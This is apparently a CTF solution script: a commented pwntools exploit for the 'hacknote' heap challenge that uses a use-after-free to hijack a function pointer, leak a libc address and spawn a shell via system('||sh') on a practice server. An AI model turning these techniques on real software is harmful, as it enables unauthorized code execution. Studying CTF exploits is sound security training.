以前做过的题目：hacknote（32 位堆题，删除 note 后仍可 show 即 UAF；利用 fastbin 块复用，把新 note 的内容写到旧 note 结构体上，覆盖其函数指针：先改成打印函数泄露 puts 地址，再改成 system 拿 shell）
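from pwn import *
from LibcSearcher import *

# Exploit for the "hacknote" heap challenge (32-bit target: p32/u32 and an
# 0x0804xxxx code address). Uncomment the process() line to run locally and
# pair it with debug(); the remote() line is the CTF instance.
context.log_level = 'debug'
# context.arch = 'amd64'
# io = process('./hacknote')
io = remote("node4.buuoj.cn", 27107)
elf = ELF('./hacknote')
# libc = ELF('libc-2.23.so')

# Address of the binary's "print note" routine, copied from the original
# script. The exploit points a note's function pointer here so that show()
# prints whatever the (also overwritten) content pointer refers to.
# Re-check it against the disassembly if the binary is ever rebuilt.
PRINT_NOTE = 0x080485fb


def debug():
    """Attach gdb to the live target and pause so breakpoints can be placed."""
    gdb.attach(io)
    pause()


def creat(size, value):
    """Menu option 1: allocate a note of `size` bytes with content `value`.

    `value` must be bytes. It is sent with sendline(); if the binary reads
    exactly `size` bytes, the trailing newline is left in its input and is
    swallowed by the next menu read -- harmless here, since every helper
    waits for the "Your choice :" prompt before sending anything.
    """
    io.recvuntil(b'Your choice :')
    io.sendline(b'1')
    io.recvuntil(b'Note size :')
    io.sendline(str(size).encode())
    io.recvuntil(b'Content :')
    io.sendline(value)


def free(idx):
    """Menu option 2: delete note `idx`.

    The challenge still lets show() use the index afterwards (see the
    show(1) calls below after free(1)), which is the use-after-free this
    exploit relies on.
    """
    io.recvuntil(b'Your choice :')
    io.sendline(b'2')
    io.recvuntil(b'Index :')
    io.sendline(str(idx).encode())


def show(i):
    """Menu option 3: display note `i` via the function pointer stored in it."""
    io.recvuntil(b'Your choice :')
    io.sendline(b'3')
    io.recvuntil(b'Index :')
    io.sendline(str(i).encode())


puts_got = elf.got['puts']

# Heap grooming. Each note is an 8-byte struct {func_ptr, content_ptr} plus a
# separately allocated content buffer; with 0x10-byte contents the two chunk
# sizes differ, so after free(1), free(0) the structs and the contents sit in
# separate fastbins (LIFO). Allocating a note with an 8-byte content then
# hands the new content buffer note 1's freed struct, so the 8 bytes we
# write become note 1's function pointer and content pointer.
creat(0x10, b'aaaa')
creat(0x10, b'bbbb')
free(1)
free(0)

# note 1 := {PRINT_NOTE, &puts@got}; show(1) therefore prints the GOT entry.
creat(0x8, p32(PRINT_NOTE) + p32(puts_got))
show(1)
# recvn(4) blocks until exactly 4 bytes arrive; recv(4) may return fewer and
# u32() would then raise (flaky leak parsing on a slow link).
puts_addr = u32(io.recvn(4))
log.success("puts_addr:" + hex(puts_addr))
# debug()

# Resolve libc from the single leak. LibcSearcher may prompt to choose
# between several candidate libcs when one offset is ambiguous; a wrong
# pick shows up as a crash at the final show(1).
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
log.success('system:{}'.format(hex(system_addr)))

# Free the controlling note so the same chunks are reused once more, then
# rewrite note 1 := {system, "||sh"}. show(1) calls system(note1): the four
# address bytes form a bogus command and the shell falls through to `|| sh`,
# so no "/bin/sh" string from libc is needed.
free(2)
creat(0x8, p32(system_addr) + b'||sh')
show(1)
io.interactive()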
